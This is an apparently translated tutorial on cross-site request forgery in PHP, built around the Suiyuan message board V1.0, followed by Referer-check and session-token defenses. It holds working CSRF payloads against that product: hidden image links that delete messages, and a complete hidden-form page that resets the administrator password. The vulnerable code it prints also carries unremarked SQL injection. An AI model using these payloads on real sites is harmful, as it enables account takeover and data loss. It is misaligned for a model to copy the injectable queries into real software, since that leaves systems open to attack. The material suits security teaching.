PHP vulnerability resolution (6): Cross-Site Request Forgery

Source: Internet
Author: User
This article describes cross-site request forgery (CSRF, also written XSRF) as it affects PHP websites. In a CSRF attack the attacker forges an HTTP request that appears to come from another user: the attacker constructs the request, the target user's browser sends it to a website that has the CSRF vulnerability, and the website executes it as if the user had made it. The attacker typically hides the request in a link or page element so that the target user triggers it without looking at it; because the browser attaches the user's session cookies, the site treats the request as authorized with the user's permissions, and the attacker's chosen action is carried out with those permissions.
For example, suppose a shopping website purchases a product through a request such as http://www.shop.com/buy.php?item=watch&num=1, where the item parameter selects the product and the num parameter sets the quantity. If the attacker sends the target user a hidden link to http://www.shop.com/buy.php?item=watch&num=1000 and the user, while logged in, accidentally triggers it, the quantity purchased becomes 1000.
Example
Suiyuan Network PHP message board V1.0
Delete any message
<?php
// delbook.php: this page deletes messages
include_once("dlyz.php");   // dlyz.php verifies the user's permission; a message can be deleted only when the permission is admin
include_once("../conn.php");
$del = $_GET["del"];
$id = $_GET["id"];
if ($del == "data")
{
    $ID_Dele = implode(",", $_POST['adid']);
    $sql = "delete from book where id in (" . $ID_Dele . ")";
    mysql_query($sql);
}
else
{
    $sql = "delete from book where id=" . $id;   // the id of the message to be deleted
    mysql_query($sql);
}
mysql_close($conn);
echo "<script>";
echo "alert('Deleted successfully!');";
echo "location='book.php';";
echo "</script>";
?>
With admin permission, requesting http://localhost/manage/delbook.php?id=2 deletes the message with id 2.
Exploitation:
Log in as a normal user and post a message whose content (entered in source-code mode) is:
<img src="delbook.php?id=2" />
<img src="delbook.php?id=3" />
<img src="delbook.php?id=4" />
<img src="delbook.php?id=5" />
This inserts four image links, each of which requests the deletion of one message id. Return to the home page: nothing has changed, and the images cannot be displayed, because the normal user's browser did fetch the four links but dlyz.php rejected the deletions for lack of admin permission.
Now log in with the administrator account and refresh the home page: only one message is left, and every message whose id appears in the image links has been deleted.
What happened is that the attacker hid image links in a message. The attacker has no permission to delete messages, so loading the links has no visible effect from the attacker's own account. When the administrator views the message page, however, the administrator's browser fetches the hidden links and sends the administrator's session cookie with each request; the administrator's permission is sufficient, so delbook.php carries out the deletions.
Change administrator password
<?php
// pass.php
include_once("dlyz.php");
include_once("../conn.php");
if ($_GET["act"])
{
    $username = $_POST["username"];
    $sh = $_POST["sh"];
    $gg = $_POST["gg"];
    $title = $_POST["title"];
    $copyright = $_POST["copyright"] . "
Design and Production: Hacker contract security net";
    $password = md5($_POST["password"]);
    if (empty($_POST["password"]))
    {
        $sql = "update ugly set username='" . $username . "', sh=" . $sh . ", gg='" . $gg . "', title='" . $title . "', copyright='" . $copyright . "' where id=1";
    }
    else
    {
        $sql = "update ugly set username='" . $username . "', password='" . $password . "', sh=" . $sh . ", gg='" . $gg . "', title='" . $title . "', copyright='" . $copyright . "' where id=1";
    }
    mysql_query($sql);
    mysql_close($conn);
    echo "<script>";
    echo "alert('Modified successfully!');";
    echo "location='pass.php';";
    echo "</script>";
}
This file modifies the administrator's password and the website settings, and nothing in it ties the submission to a page the administrator actually opened. The attacker can therefore construct the form pass.php expects directly, using the field names it reads (username, password, sh, gg, title, copyright). Values in capitals are attacker-chosen placeholders:

<html>
<body>
<!-- act must be non-empty; the path follows the delbook.php example above -->
<form action="http://localhost/manage/pass.php?act=1" method="post">
<input type="hidden" name="username" value="NEW_ADMIN_USERNAME">
<input type="hidden" name="password" value="NEW_ADMIN_PASSWORD">
<input type="hidden" name="sh" value="1"> <!-- numeric review switch -->
<textarea name="gg">You are welcome to install and use the PHP message board V1.0 on the Suiyuan network (with the review function)!</textarea>
<input type="hidden" name="title" value="SITE_TITLE">
<textarea name="copyright">Suiyuan Network PHP message book V1.0 Copyright: Xiamen Suiyuan network technology 2005-2009
Provide discount host domain name for website construction and system customization</textarea>
<input type="submit" value="Submit">
</form>
</body>
</html>

Save it as attack.html, host it on a website you control, and get the administrator to open it while logged in to the message board. The submission arrives with the administrator's session cookie, and pass.php overwrites the username and password. A script on the page can submit the form as soon as it loads, so the administrator does not even need to click.
Defense methods
Preventing CSRF is harder than preventing many other attacks: although the HTTP request is forged by the attacker, it is sent by the target user's own browser, with the user's cookies, so the server cannot distinguish it from a legitimate request by looking at the session alone. Three common defenses are:
1. Check the web page source (the Referer header).
2. Check a built-in hidden variable (an anti-CSRF token).
3. Use POST instead of GET.
The third is the weakest: it defeats the <img> trick used against delbook.php, but a hidden form on the attacker's page submits a POST request just as easily, which is exactly what the attack on pass.php above does. A Referer check is a useful secondary measure but depends on a header the browser may omit or a proxy may strip. The hidden token is the defense to rely on.
Check the web page source
Add the following check to the beginning of the handler in pass.php so that a submission is processed only when its Referer names this server (the added lines are marked with comments):

<?php
// pass.php with a Referer check
include_once("dlyz.php");
include_once("../conn.php");
if ($_GET["act"])
{
    // added: verify where the submission came from
    if (isset($_SERVER["HTTP_REFERER"]))
    {
        $serverhost = $_SERVER["SERVER_NAME"];
        // parse_url() takes the host part of the Referer whether the scheme is http or https;
        // stripping "http://" and splitting on "/" would leave an https:// Referer intact and fail the check
        $sourcehost = (string) parse_url($_SERVER["HTTP_REFERER"], PHP_URL_HOST);
        // compare the whole host: comparing only the first strlen($serverhost) characters,
        // as strncmp() would, lets a Referer from example.com.attacker.net pass for example.com
        if (strcasecmp($sourcehost, $serverhost) != 0)
        {
            unset($_POST);
            echo "<script>";
            echo "alert('Data source exception!');";
            echo "location='index.php';";
            echo "</script>";
            exit;   // stop here; otherwise the update below still runs with empty values and blanks the administrator's username
        }
    }
    $username = $_POST["username"];
    $sh = $_POST["sh"];
    $gg = $_POST["gg"];
    $title = $_POST["title"];
    $copyright = $_POST["copyright"] . "
Design and Production: Xiamen Suiyuan network technology";
    $password = md5($_POST["password"]);
    if (empty($_POST["password"]))
    {
        $sql = "update ugly set username='" . $username . "', sh=" . $sh . ", gg='" . $gg . "', title='" . $title . "', copyright='" . $copyright . "' where id=1";
    }
    else
    {
        $sql = "update ugly set username='" . $username . "', password='" . $password . "', sh=" . $sh . ", gg='" . $gg . "', title='" . $title . "', copyright='" . $copyright . "' where id=1";
    }
    mysql_query($sql);
    mysql_close($conn);
    echo "<script>";
    echo "alert('Modified successfully!');";
    echo "location='pass.php';";
    echo "</script>";
}

Two limitations remain. When the browser sends no Referer at all (some browsers, privacy extensions and proxies suppress it, and an attacker's page can instruct the browser to omit it), the check is skipped and the request is processed, so the header should be treated as a secondary signal rather than the sole defense. And the check protects only pass.php; every other state-changing script, delbook.php included, needs the same treatment.
Check a built-in hidden variable
Put a hidden variable in the form and the same value in a session variable; on submission, compare the hidden variable with the session variable to decide whether the request was made from the site's own page:

<?php
include_once("dlyz.php");
include_once("../conn.php");
if ($_GET["act"])
{
    if (!isset($_SESSION["post_id"]))
    {
        // generate a unique id and hash it with MD5
        $post_id = md5(uniqid(rand(), true));
        // create the session variable
        $_SESSION["post_id"] = $post_id;
    }
    // check whether the values are equal
    if (isset($_SESSION["post_id"]))
    {
        // not equal: reject the request
        if ($_SESSION["post_id"] != $_POST["post_id"])
        {
            // clear the POST variables
            unset($_POST);
            exit;
        }
    }
    // ... process the form as in pass.php ...
}

The listing ends part-way through the rejection branch, and it omits two parts the mechanism needs: session_start() before $_SESSION is touched, and a hidden field in the form, <input type="hidden" name="post_id" value="...">, filled with the session value when the form page is rendered. A token created only at submission time, as above, can never match a submitted value, so the generation must happen when the form is displayed. Three further points for a production implementation: uniqid() is derived from the clock and rand() is not a cryptographic generator, so the token is not unpredictable in the sense CSRF protection requires; != compares strings with early exit and should be replaced by a constant-time comparison; and the check must cover every state-changing script, not only pass.php.